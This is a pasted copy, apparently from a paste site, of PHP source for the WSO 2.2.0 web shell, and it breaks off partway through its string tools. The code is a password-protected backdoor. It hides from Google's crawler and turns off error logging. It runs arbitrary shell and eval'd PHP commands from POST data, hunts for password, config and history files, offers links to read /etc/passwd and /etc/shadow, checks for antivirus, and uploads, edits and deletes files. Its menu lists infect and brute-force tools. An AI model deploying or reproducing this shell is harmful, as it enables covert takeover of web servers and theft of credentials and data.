stzAsZQL

· 5 years ago · Mar 18, 2020, 11:48 PM
1
2<?php $auth_pass = "21232f297a57a5a743894a0e4a801fc3";
3 $color = "#fff";
4 $default_action = 'FilesMan';
5 @define('SELF_PATH', __FILE__);
6 if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found');
7 exit;
8 } @session_start();
9 @error_reporting(0);
10 @ini_set('error_log',NULL);
11 @ini_set('log_errors',0);
12 @ini_set('max_execution_time',0);
13 @set_time_limit(0);
14 @set_magic_quotes_runtime(0);
15 @define('VERSION', '2.2.0');
16 if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
17 } $_POST = stripslashes_array($_POST);
18 } function printLogin() { 
19?>
20	<center>
21	<form method=post style="font-family:fantasy;
22">
23	Password: <input type=password name=pass style="background-color:whitesmoke;
24border:1px solid #FFF;
25"><input type=submit value='>>' style="border:none;
26background-color:teal;
27color:#fff;
28">
29	</form></center>
30	
31<?php exit;
32 } if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) if( empty( $auth_pass ) || ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
33 else printLogin();
34 if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = 'win';
35 else $os = 'nix';
36 $safe_mode = @ini_get('safe_mode');
37 $disable_functions = @ini_get('disable_functions');
38 $home_cwd = @getcwd();
39 if( isset( $_POST['c'] ) ) @chdir($_POST['c']);
40 $cwd = @getcwd();
41 if( $os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd);
42 $cwd = str_replace("\\", "/", $cwd);
43 } if( $cwd[strlen($cwd)-1] != '/' ) $cwd .= '/';
44 if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );
45 else $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );
46 function printHeader() { if(empty($_POST['charset'])) $_POST['charset'] = "UTF-8";
47 global $color;
48 
49?>
50<html><head><meta http-equiv='Content-Type' content='text/html;
51 charset=
52<?php echo $_POST['charset']
53?>'><title>
54<?php echo $_SERVER['HTTP_HOST']
55?> - WSO 
56<?php echo VERSION
57?></title>
58<style>
59	body {background-color:#000;
60color:#e1e1e1;
61}
62	body,td,th	{font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;
63margin:0;
64vertical-align:top;
65}
66	table.info	{color:#C3C3C3;
67background-color:#000;
68}
69	span,h1,a	{color:
70<?php echo $color
71?> !important;
72}
73	span		{font-weight:bolder;
74}
75	h1			{border-left:5px solid teal;
76padding:2px 5px;
77font:14pt Verdana;
78background-color:#222;
79margin:0px;
80}
81	div.content	{padding:5px;
82margin-left:5px;
83background-color:#000;
84}
85	a			{text-decoration:none;
86}
87	a:hover		{text-decoration:underline;
88}
89	.ml1		{border:1px solid #444;
90padding:5px;
91margin:0;
92overflow:auto;
93}
94	.bigarea	{width:100%;
95height:250px;
96 }
97	input, textarea, select	{margin:0;
98color:#fff;
99background-color:#444;
100border:1px solid #000;
101 font:9pt Courier New;
102}
103	form		{margin:0px;
104}
105	#toolsTbl	{text-align:center;
106}
107	.toolsInp	{width:300px}
108	.main th	{text-align:left;
109background-color:#000;
110}
111	.main tr:hover{background-color:#5e5e5e}
112	.main td, th{vertical-align:middle}
113	.l1			{background-color:#444}
114	pre			{font:9pt Courier New;
115}
116</style>
117<script>
118	function set(a,c,p1,p2,p3,charset) {
119		if(a != null)document.mf.a.value=a;
120		if(c != null)document.mf.c.value=c;
121		if(p1 != null)document.mf.p1.value=p1;
122		if(p2 != null)document.mf.p2.value=p2;
123		if(p3 != null)document.mf.p3.value=p3;
124		if(charset != null)document.mf.charset.value=charset;
125	}
126	function g(a,c,p1,p2,p3,charset) {
127		set(a,c,p1,p2,p3,charset);
128		document.mf.submit();
129	}
130	function a(a,c,p1,p2,p3,charset) {
131		set(a,c,p1,p2,p3,charset);
132		var params = "ajax=true";
133		for(i=0;
134i<document.mf.elements.length;
135i++)
136			params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
137		sr('
138<?php echo $_SERVER['REQUEST_URI'];
139
140?>', params);
141	}
142	function sr(url, params) {	
143		if (window.XMLHttpRequest) {
144			req = new XMLHttpRequest();
145			req.onreadystatechange = processReqChange;
146			req.open("POST", url, true);
147			req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
148			req.send(params);
149		} 
150		else if (window.ActiveXObject) {
151			req = new ActiveXObject("Microsoft.XMLHTTP");
152			if (req) {
153				req.onreadystatechange = processReqChange;
154				req.open("POST", url, true);
155				req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
156				req.send(params);
157			}
158		}
159	}
160	function processReqChange() {
161		if( (req.readyState == 4) )
162			if(req.status == 200) {
163				//alert(req.responseText);
164				var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
165				var arr=reg.exec(req.responseText);
166				eval(arr[2].substr(0, arr[1]));
167			} 
168			else alert("Request error!");
169	}
170</script>
171<head><body><div style="position:absolute;
172width:100%;
173background-color:#444;
174top:0;
175left:0;
176">
177<form method=post name=mf style='display:none;
178'>
179<input type=hidden name=a value='
180<?php echo isset($_POST['a'])?$_POST['a']:''
181?>'>
182<input type=hidden name=c value='
183<?php echo htmlspecialchars($GLOBALS['cwd'])
184?>'>
185<input type=hidden name=p1 value='
186<?php echo isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''
187?>'>
188<input type=hidden name=p2 value='
189<?php echo isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''
190?>'>
191<input type=hidden name=p3 value='
192<?php echo isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''
193?>'>
194<input type=hidden name=charset value='
195<?php echo isset($_POST['charset'])?$_POST['charset']:''
196?>'>
197</form>
198
199<?php $freeSpace = @diskfreespace($GLOBALS['cwd']);
200 $totalSpace = @disk_total_space($GLOBALS['cwd']);
201 $totalSpace = $totalSpace?$totalSpace:1;
202 $release = @php_uname('r');
203 $kernel = @php_uname('s');
204 $millink='https://github.com/HARDLINUX/webshell/search?utf8=✓&q=';
205 if( strpos('Linux', $kernel) !== false ) $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
206 else $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
207 if(!function_exists('posix_getegid')) { $user = @get_current_user();
208 $uid = @getmyuid();
209 $gid = @getmygid();
210 $group = "?";
211 } else { $uid = @posix_getpwuid(@posix_geteuid());
212 $gid = @posix_getgrgid(@posix_getegid());
213 $user = $uid['name'];
214 $uid = $uid['uid'];
215 $group = $gid['name'];
216 $gid = $gid['gid'];
217 } $cwd_links = '';
218 $path = explode("/", $GLOBALS['cwd']);
219 $n=count($path);
220 for($i=0;
221$i<$n-1;
222$i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
223 for($j=0;
224$j<=$i;
225$j++) $cwd_links .= $path[$j].'/';
226 $cwd_links .= "\")'>".$path[$i]."/</a>";
227 } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
228 $opt_charsets = '';
229 foreach($charsets as $item) $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
230 $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Domains'=>'Domains');
231 if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout';
232 $m['Self remove'] = 'SelfRemove';
233 $menu = '';
234 foreach($m as $k => $v) $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
235 $drives = "";
236 if ($GLOBALS['os'] == 'win') { foreach( range('a','z') as $drive ) if (is_dir($drive.':\\')) $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
237 } echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'. '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[Exploit-Git]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00A8A8><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'. '<table cellpadding=3 cellspacing=0 width=100% style="background-color:teal;
238"><tr>'.$menu.'</tr></table><div>';
239 } function printFooter() { $is_writable = is_writable($GLOBALS['cwd'])?"<font color=teal>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
240 
241?>
242</div>
243<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%">
244	<tr>
245		<td><form onsubmit="g(null,this.c.value);
246return false;
247"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="
248<?php echo htmlspecialchars($GLOBALS['cwd']);
249
250?>"><input type=submit value=">>"></form></td>
251		<td><form onsubmit="g('FilesTools',null,this.f.value);
252return false;
253"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
254	</tr>
255	<tr>
256		<td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);
257return false;
258"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>
259<?php echo $is_writable
260?></td>
261		<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');
262return false;
263"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>
264<?php echo $is_writable
265?></td>
266	</tr>
267	<tr>
268		<td><form onsubmit="g('Console',null,this.c.value);
269return false;
270"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
271		<td><form method='post' ENCTYPE='multipart/form-data'>
272		<input type=hidden name=a value='FilesMAn'>
273		<input type=hidden name=c value='
274<?php echo htmlspecialchars($GLOBALS['cwd'])
275?>'>
276		<input type=hidden name=p1 value='uploadFile'>
277		<input type=hidden name=charset value='
278<?php echo isset($_POST['charset'])?$_POST['charset']:''
279?>'>
280		<span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>
281<?php echo $is_writable
282?></td>
283	</tr>
284</table>
285</div>
286</body></html>
287
288<?php } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false;
289 } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false;
290 } } function ex($in) { $out = '';
291 if(function_exists('exec')) { @exec($in,$out);
292 $out = @join("\n",$out);
293 }elseif(function_exists('passthru')) { ob_start();
294 @passthru($in);
295 $out = ob_get_clean();
296 }elseif(function_exists('system')) { ob_start();
297 @system($in);
298 $out = ob_get_clean();
299 }elseif(function_exists('shell_exec')) { $out = shell_exec($in);
300 }elseif(is_resource($f = @popen($in,"r"))) { $out = "";
301 while(!@feof($f)) $out .= fread($f,1024);
302 pclose($f);
303 } return $out;
304 } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB';
305 elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB';
306 elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB';
307 else return $s . ' B';
308 } function perms($p) { if (($p & 0xC000) == 0xC000)$i = 's';
309 elseif (($p & 0xA000) == 0xA000)$i = 'l';
310 elseif (($p & 0x8000) == 0x8000)$i = '-';
311 elseif (($p & 0x6000) == 0x6000)$i = 'b';
312 elseif (($p & 0x4000) == 0x4000)$i = 'd';
313 elseif (($p & 0x2000) == 0x2000)$i = 'c';
314 elseif (($p & 0x1000) == 0x1000)$i = 'p';
315 else $i = 'u';
316 $i .= (($p & 0x0100) ? 'r' : '-');
317 $i .= (($p & 0x0080) ? 'w' : '-');
318 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
319 $i .= (($p & 0x0020) ? 'r' : '-');
320 $i .= (($p & 0x0010) ? 'w' : '-');
321 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
322 $i .= (($p & 0x0004) ? 'r' : '-');
323 $i .= (($p & 0x0002) ? 'w' : '-');
324 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
325 return $i;
326 } function viewPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
327 elseif (!@is_writable($f)) return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
328 else return '<font color=#00A8A8><b>'.perms(@fileperms($f)).'</b></font>';
329 } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);
330 while (false !== ($filename = readdir($dh))) { $files[] = $filename;
331 } return $files;
332 } } function which($p) { $path = ex('which '.$p);
333 if(!empty($path)) return $path;
334 return false;
335 } function actionSecInfo() { printHeader();
336 echo '<h1>Server security information</h1><div class=content>';
337 function showSecParam($n, $v) { $v = trim($v);
338 if($v) { echo '<span>'.$n.': </span>';
339 if(strpos($v, "\n") === false) echo $v.'<br>';
340 else echo '<pre class=ml1>'.$v.'</pre>';
341 } } showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
342 showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
343 showSecParam('Open base dir', @ini_get('open_basedir'));
344 showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
345 showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
346 showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
347 $temp=array();
348 if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")";
349 if(function_exists('mssql_connect')) $temp[] = "MSSQL";
350 if(function_exists('pg_connect')) $temp[] = "PostgreSQL";
351 if(function_exists('oci_connect')) $temp[] = "Oracle";
352 showSecParam('Supported databases', implode(', ', $temp));
353 echo '<br>';
354 if( $GLOBALS['os'] == 'nix' ) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
355 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
356 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
357 showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
358 showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
359 showSecParam('OS version', @file_get_contents('/proc/version'));
360 showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
361 if(!$GLOBALS['safe_mode']) { echo '<br>';
362 $temp=array();
363 foreach ($userful as $item) if(which($item)){$temp[]=$item;
364} showSecParam('Userful', implode(', ',$temp));
365 $temp=array();
366 foreach ($danger as $item) if(which($item)){$temp[]=$item;
367} showSecParam('Danger', implode(', ',$temp));
368 $temp=array();
369 foreach ($downloaders as $item) if(which($item)){$temp[]=$item;
370} showSecParam('Downloaders', implode(', ',$temp));
371 echo '<br/>';
372 showSecParam('Hosts', @file_get_contents('/etc/hosts'));
373 showSecParam('HDD space', ex('df -h'));
374 showSecParam('Mount options', @file_get_contents('/etc/fstab'));
375 } } else { showSecParam('OS Version',ex('ver'));
376 showSecParam('Account Settings',ex('net accounts'));
377 showSecParam('User Accounts',ex('net user'));
378 } echo '</div>';
379 printFooter();
380 } function actionPhp() { if( isset($_POST['ajax']) ) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
381 ob_start();
382 eval($_POST['p1']);
383 $temp = "document.getElementById('PhpOutput').style.display='';
384document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';
385\n";
386 echo strlen($temp), "\n", $temp;
387 exit;
388 } printHeader();
389 if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { echo '<h1>PHP info</h1><div class=content>';
390 ob_start();
391 phpinfo();
392 $tmp = ob_get_clean();
393 $tmp = preg_replace('!body {.*}!msiU','',$tmp);
394 $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
395 $tmp = preg_replace('!h1!msiU','h2',$tmp);
396 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
397 $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
398 echo $tmp;
399 echo '</div><br>';
400 } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
401 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);
402}else{g(null,null,this.code.value,\'\');
403}return false;
404"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
405 echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;
406':'').'margin-top:5px;
407" class=ml1>';
408 if(!empty($_POST['p1'])) { ob_start();
409 eval($_POST['p1']);
410 echo htmlspecialchars(ob_get_clean());
411 } echo '</pre></div>';
412 printFooter();
413 } function actionFilesMan() { printHeader();
414 echo '<h1>File manager</h1><div class=content>';
415 if(isset($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!";
416 break;
417 break;
418 case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir";
419 break;
420 case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/';
421 $dh = opendir($path);
422 while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;
423 if ( (basename($item) == "..") || (basename($item) == ".") ) continue;
424 $type = filetype($item);
425 if ($type == "dir") deleteDir($item);
426 else @unlink($item);
427 } closedir($dh);
428 rmdir($path);
429 } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { $f = urldecode($f);
430 if(is_dir($f)) deleteDir($f);
431 else @unlink($f);
432 } break;
433 case 'paste': if($_SESSION['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);
434 $h = opendir($c.$s);
435 while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.'/',$f, $d.$s.'/');
436 } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);
437 } } foreach($_SESSION['f'] as $f) copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
438 } elseif($_SESSION['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);
439 $h = opendir($c.$s);
440 while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.'/',$f, $d.$s.'/');
441 } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);
442 } } foreach($_SESSION['f'] as $f) @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
443 } unset($_SESSION['f']);
444 break;
445 default: if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) { $_SESSION['act'] = @$_POST['p1'];
446 $_SESSION['f'] = @$_POST['f'];
447 foreach($_SESSION['f'] as $k => $f) $_SESSION['f'][$k] = urldecode($f);
448 $_SESSION['cwd'] = @$_POST['c'];
449 } break;
450 } echo '<script>document.mf.p1.value="";
451document.mf.p2.value="";
452</script>';
453 } $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
454 if($dirContent === false) { echo 'Can\'t open this folder!';
455 return;
456 } global $sort;
457 $sort = array('name', 1);
458 if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]);
459 } 
460?>
461<script>
462	function sa() {
463		for(i=0;
464i<document.files.elements.length;
465i++)
466			if(document.files.elements[i].type == 'checkbox')
467				document.files.elements[i].checked = document.files.elements[0].checked;
468	}
469</script>
470<table width='100%' class='main' cellspacing='0' cellpadding='2'>
471<form name=files method=post>
472
473<?php echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
474 $dirs = $files = $links = array();
475 $n = count($dirContent);
476 for($i=0;
477$i<$n;
478$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
479 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
480 $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])), 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) );
481 if(@is_file($GLOBALS['cwd'].$dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file'));
482 elseif(@is_link($GLOBALS['cwd'].$dirContent[$i])) $links[] = array_merge($tmp, array('type' => 'link'));
483 elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir'));
484 } $GLOBALS['sort'] = $sort;
485 function cmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
486 else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
487 } usort($files, "cmp");
488 usort($dirs, "cmp");
489 usort($links, "cmp");
490 $files = array_merge($dirs, $links, $files);
491 $l = 0;
492 foreach($files as $f) { echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');
493"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
494 $l = $l?0:1;
495 } 
496?>
497	<tr><td colspan=7>
498	<input type=hidden name=a value='FilesMan'>
499	<input type=hidden name=c value='
500<?php echo htmlspecialchars($GLOBALS['cwd'])
501?>'>
502	<input type=hidden name=charset value='
503<?php echo isset($_POST['charset'])?$_POST['charset']:''
504?>'>
505	<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>
506<?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){
507?><option value='paste'>Paste</option>
508<?php }
509?></select>&nbsp;
510<input type="submit" value=">>"></td></tr>
511	</form></table></div>
512	
513<?php printFooter();
514 } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));
515}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';
516for($i=0;
517$i<strLen($p);
518$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));
519}return $r;
520}} if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';
521for($i=0;
522$i<strlen($p);
523++$i)$r.= dechex(ord($p[$i]));
524return strtoupper($r);
525}} if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';
526for($i=0;
527$i<strlen($p);
528++$i)$r.= '%'.dechex(ord($p[$i]));
529return strtoupper($r);
530}} if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
531 ob_start();
532 if(function_exists($_POST['p1'])) echo $_POST['p1']($_POST['p2']);
533 $temp = "document.getElementById('strOutput').style.display='';
534document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';
535\n";
536 echo strlen($temp), "\n", $temp;
537 exit;
538 } printHeader();
539 echo '<h1>String conversions</h1><div class=content>';
